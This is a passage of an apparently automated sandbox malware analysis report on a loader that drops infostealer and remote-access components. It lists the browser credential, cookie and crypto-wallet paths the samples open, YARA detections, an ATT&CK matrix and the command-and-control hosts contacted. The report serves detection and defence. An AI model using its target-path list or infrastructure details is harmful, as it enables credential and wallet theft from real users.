                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcckkdbjnoikooededlapcalpionmalo
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bocpokimicclpaiekenaeelehdjllofo
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pocmplpaccanhmnllbbkpgfliimjljgo
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\cookies.sqlite
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jblndlipeogpafnldhgmapagcccfchpi
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\Profiles
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pnlfjmlcjdjgkddecgincndfgegkecke
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\agoakfejjabomempkjlepdflaleeobhb
                        Tries to steal Crypto Currency Wallets
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
                        Source: Yara matchFile source: 2.2.KoaguarLoader.exe.e80000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.HkqNfKUrMBAD.exe.6e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.I1y524I4zau1n3u.exe.290000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.I1y524I4zau1n3u.exe.290000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.HkqNfKUrMBAD.exe.6e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000017.00000001.1289075938.0000000000291000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.939032080.0000000000E81000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1079600336.00000000006E1000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.943416104.0000000000291000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.2129024902.0000000000291000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.1215210538.00000000006E1000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: KoaguarLoader.exe PID: 5744, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: I1y524I4zau1n3u.exe PID: 3816, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: HkqNfKUrMBAD.exe PID: 7336, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: I1y524I4zau1n3u.exe PID: 7616, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: I1y524I4zau1n3u.exe PID: 5908, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected Salat Stealer
                        Source: Yara matchFile source: 2.2.KoaguarLoader.exe.e80000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.HkqNfKUrMBAD.exe.6e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.I1y524I4zau1n3u.exe.290000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.I1y524I4zau1n3u.exe.290000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.HkqNfKUrMBAD.exe.6e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000010.00000002.1215210538.0000000000EDD000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.939032080.000000000167D000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.2129024902.0000000000A8D000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1079600336.0000000000EDD000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.943416104.0000000000A8D000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: KoaguarLoader.exe PID: 5744, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: I1y524I4zau1n3u.exe PID: 3816, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: HkqNfKUrMBAD.exe PID: 7336, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: I1y524I4zau1n3u.exe PID: 7616, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: HkqNfKUrMBAD.exe PID: 7956, type: MEMORYSTR
                        Yara detected Telegram RAT
                        Source: Yara matchFile source: Process Memory Space: svhost.exe PID: 5248, type: MEMORYSTR
                        Yara detected XWorm
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: KoaguarLoader.exe, type: SAMPLE
                        Source: Yara matchFile source: 3.2.svhost.exe.31e05f0.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.svhost.exe.31e05f0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.KoaguarLoader.exe.727e94.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.0.svhost.exe.f00000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.KoaguarLoader.exe.a5f010.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.KoaguarLoader.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.KoaguarLoader.exe.409294.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.KoaguarLoader.exe.409294.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.877294126.0000000000A50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.868675253.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.2138122248.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000000.877223219.0000000000F02000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: KoaguarLoader.exe PID: 6992, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svhost.exe PID: 5248, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svhost.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svhost.exe, type: DROPPED

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		11
                        Disable or Modify Tools                        		1
                        OS Credential Dumping                        		1
                        File and Directory Discovery                        		Remote Services11
                        Archive Collected Data                        		1
                        Web Service                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        PowerShell                        		121
                        Registry Run Keys / Startup Folder                        		12
                        Process Injection                        		1
                        Deobfuscate/Decode Files or Information                        		11
                        Input Capture                        		34
                        System Information Discovery                        		Remote Desktop Protocol3
                        Data from Local System                        		1
                        Ingress Tool Transfer                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)121
                        Registry Run Keys / Startup Folder                        		12
                        Obfuscated Files or Information                        		Security Account Manager561
                        Security Software Discovery                        		SMB/Windows Admin Shares11
                        Input Capture                        		11
                        Encrypted Channel                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook21
                        Software Packing                        		NTDS2
                        Process Discovery                        		Distributed Component Object ModelInput Capture1
                        Non-Standard Port                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading                        		LSA Secrets171
                        Virtualization/Sandbox Evasion                        		SSHKeylogging2
                        Non-Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                        Masquerading                        		Cached Domain Credentials1
                        Application Window Discovery                        		VNCGUI Input Capture13
                        Application Layer Protocol                        		Data Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items171
                        Virtualization/Sandbox Evasion                        		DCSync1
                        System Network Configuration Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                        Process Injection                        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1635431 Sample: KoaguarLoader.exe Startdate: 11/03/2025 Architecture: WINDOWS Score: 100 56 api.telegram.org 2->56 58 develop-oregon.gl.at.ply.gg 2->58 60 ip-api.com 2->60 74 Suricata IDS alerts for network traffic 2->74 76 Found malware configuration 2->76 78 Malicious sample detected (through community Yara rule) 2->78 82 19 other signatures 2->82 9 KoaguarLoader.exe 3 2->9         started        13 I1y524I4zau1n3u.exe 2->13         started        16 HkqNfKUrMBAD.exe 2->16         started        18 4 other processes 2->18 signatures3 80 Uses the Telegram API (likely for C&C communication) 56->80 process4 dnsIp5 52 C:\Users\user\AppData\Local\Temp\svhost.exe, PE32 9->52 dropped 54 C:\Users\user\AppData\...\KoaguarLoader.exe, PE32 9->54 dropped 96 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->96 20 svhost.exe 15 5 9->20         started        25 KoaguarLoader.exe 2 5 9->25         started        70 104.21.84.111, 443, 54517 CLOUDFLARENETUS United States 13->70 98 Found many strings related to Crypto-Wallets (likely being stolen) 13->98 100 Tries to harvest and steal browser information (history, passwords, etc) 13->100 102 Tries to steal Crypto Currency Wallets 13->102 104 Antivirus detection for dropped file 16->104 106 Multi AV Scanner detection for dropped file 16->106 72 127.0.0.1 unknown unknown 18->72 file6 signatures7 process8 dnsIp9 62 develop-oregon.gl.at.ply.gg 147.185.221.25, 41793, 49703, 49704 SALSGIVERUS United States 20->62 64 ip-api.com 208.95.112.1, 49685, 80 TUT-ASUS United States 20->64 66 api.telegram.org 149.154.167.220, 443, 49702 TELEGRAMRU United Kingdom 20->66 46 C:\Users\user\AppData\Roaming\svhost.exe, PE32 20->46 dropped 84 Antivirus detection for dropped file 20->84 86 Multi AV Scanner detection for dropped file 20->86 88 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 20->88 94 5 other signatures 20->94 27 powershell.exe 23 20->27         started        30 powershell.exe 23 20->30         started        32 powershell.exe 20->32         started        34 powershell.exe 20->34         started        68 172.67.191.102, 443, 50310, 60812 CLOUDFLARENETUS United States 25->68 48 C:\Users\user\AppData\...\HkqNfKUrMBAD.exe, PE32 25->48 dropped 50 C:\...\I1y524I4zau1n3u.exe, PE32 25->50 dropped 90 Found many strings related to Crypto-Wallets (likely being stolen) 25->90 92 Creates multiple autostart registry keys 25->92 36 I1y524I4zau1n3u.exe 25->36         started        file10 signatures11 process12 signatures13 108 Loading BitLocker PowerShell Module 27->108 38 conhost.exe 27->38         started        40 conhost.exe 30->40         started        42 conhost.exe 32->42         started        44 conhost.exe 34->44         started        process14

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.